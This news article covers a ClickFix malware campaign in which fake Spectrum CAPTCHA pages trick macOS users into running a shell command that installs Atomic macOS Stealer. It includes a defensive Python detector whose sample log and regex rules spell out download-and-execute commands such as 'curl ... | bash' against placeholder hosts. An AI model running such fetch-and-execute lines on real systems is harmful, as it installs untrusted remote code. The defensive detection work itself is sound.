New macOS Malware Campaign Uses ClickFix Trick to Target Apple Users

June 06, 2025


Cybersecurity experts have uncovered a fresh malware campaign targeting macOS users through a social engineering technique known as ClickFix. This operation aims to deceive users into downloading malware called Atomic macOS Stealer (AMOS), designed to steal sensitive information from Apple devices.

Researchers at CloudSEK report that the attackers exploit lookalike domains mimicking the U.S. telecom company Spectrum. These fake sites prompt visitors to complete a CAPTCHA to “verify security,” but when users attempt the check, they encounter a failure message pushing them toward an “Alternative Verification” process.

Accepting this alternative causes a command to be copied to the user’s clipboard, along with instructions to run certain commands based on their operating system. While Windows users are directed to execute a PowerShell command, macOS users are instructed to run a shell script via the Terminal app.

This shell script asks users for their system password and proceeds to download the Atomic Stealer malware, which uses native macOS commands to harvest credentials, bypass defenses, and install malicious files.
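For defenders, the pasted-command step described above is the point where this chain can be spotted. The following is an added example, not code from CloudSEK or from the campaign: it flags download-and-execute command lines launched from Terminal. The tab-separated log format, the rule names, and the `example.invalid` hosts are assumptions constructed for illustration.

```python
import re

# A URL fetched with curl/wget, and a shell interpreter (optionally by path).
FETCH = r"(?:curl|wget)\b[^|;&]*https?://"
SHELL = r"(?:/\S*/|\b)(?:ba|z|da)?sh\b"

# Download-and-execute shapes. These are generic heuristics chosen for this
# example, not indicators published for the campaign in the article.
RULES = {
    "pipe_to_shell": re.compile(FETCH + r"[^|]*\|\s*(?:sudo\s+)?" + SHELL),
    "command_substitution": re.compile(SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH),
    "process_substitution": re.compile(SHELL + r"\s+<\(\s*" + FETCH),
}

def classify(command):
    """Return the names of the rules that a single command line matches."""
    return [name for name, rx in RULES.items() if rx.search(command)]

def scan(log_lines):
    """Return (timestamp, rules, command) for flagged tab-separated log lines."""
    hits = []
    for line in log_lines:
        ts, parent, command = line.rstrip("\n").split("\t", 2)
        rules = classify(command)
        # Only commands typed or pasted into Terminal are in scope here.
        if parent == "Terminal" and rules:
            hits.append((ts, rules, command))
    return hits

# Constructed sample log: timestamp <TAB> parent app <TAB> command line.
SAMPLE_LOG = [
    "2025-06-06T10:01:02Z\tTerminal\tcurl -fsSL https://portal.example.invalid/verify.sh | bash",
    "2025-06-06T10:03:10Z\tTerminal\t/bin/bash -c \"$(curl -fsSL https://portal.example.invalid/update.sh)\"",
    "2025-06-06T10:05:44Z\tTerminal\tcurl -O https://downloads.example.invalid/report.pdf",
    "2025-06-06T10:07:19Z\tTerminal\tssh admin@build.example.invalid",
    "2025-06-06T10:09:30Z\tjenkins\tcurl -s https://ci.example.invalid/bootstrap.sh | sh",
]

if __name__ == "__main__":
    for ts, rules, command in scan(SAMPLE_LOG):
        print(ts, ",".join(rules), command)
```

The same shapes match legitimate one-line installers such as Homebrew's, so a hit is a prompt to check the source domain and what the user was doing, not a verdict.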

Security analyst Koushik Pal points out that the attackers made several errors in their setup, such as mixing instructions for Windows and macOS users, suggesting a rushed deployment.

The campaign appears linked to Russian-speaking cybercriminals, as indicated by Russian comments found in the malware code.

This ClickFix tactic, which manipulates users into running harmful commands disguised as routine verifications, has been increasingly observed in recent months. Attackers leverage this method to deliver a wide array of malware, including trojans, stealers, and ransomware.

The threat actors commonly use fake CAPTCHA pages that look identical to legitimate services such as Google reCAPTCHA or Cloudflare Turnstile. These pages sometimes appear on compromised websites, making them harder to detect.

Experts warn that users’ habitual quick-clicking on verification prompts, known as “verification fatigue,” is exploited by these campaigns to gain unauthorized access and steal data.

Similar campaigns have targeted organizations via email phishing, with malicious links leading victims to fake CAPTCHA pages that install remote access tools or information stealers.

Security firms have detected numerous ClickFix-based attacks across multiple regions, including Europe, the Middle East, Africa, and the United States, noting that the technique is flexible and increasingly popular among cybercriminals.

Stay informed. Stay secure.
—Cybersecurity88 Editorial Team
